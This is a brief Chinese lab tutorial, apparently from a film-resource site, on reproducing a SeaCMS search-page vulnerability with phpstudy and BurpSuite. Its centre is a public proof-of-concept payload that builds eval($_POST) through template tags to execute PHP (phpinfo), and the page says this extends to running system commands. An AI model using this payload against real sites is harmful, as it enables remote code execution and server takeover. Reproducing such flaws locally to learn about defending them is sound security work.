教程帮助

搭建海洋cms看漏洞的利用来保护自己的网站安全

时间:2021-12-13 14:29:50   作者:jierai.com   来源:阿杰影视资源   阅读:175   评论:0
内容摘要:mysql+php用phpstudy即可下载好之后开始搭建,将uploads里的所有文件复制到网站服务器中包里有安装说明0x01开始复现安装完毕后进入主页设置代理127.0.0.18080端口,打开BurpSuite抓包这里直接用网上的pocsearchtype=5&searchword={if{searchp...

mysql+php 用phpstudy即可

下载好之后开始搭建, 将uploads里的所有文件复制到网站服务器中

包里有安装说明

 

0x01 开始复现

安装完毕后进入主页

 

设置代理127.0.0.1 8080端口, 打开BurpSuite抓包

 

这里直接用网上的poc

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

我们复制过来看看效果

 

改好直接forward 过我们看下效果

 

0x02 漏洞利用

进一步利用,可以执行系统命令

 

 


标签:searchpage  amp  中包  搭建  漏洞  
相关评论

如果本站侵犯了您的权益请邮件[email protected]     站长阿杰:79115960
  粤ICP备18135429号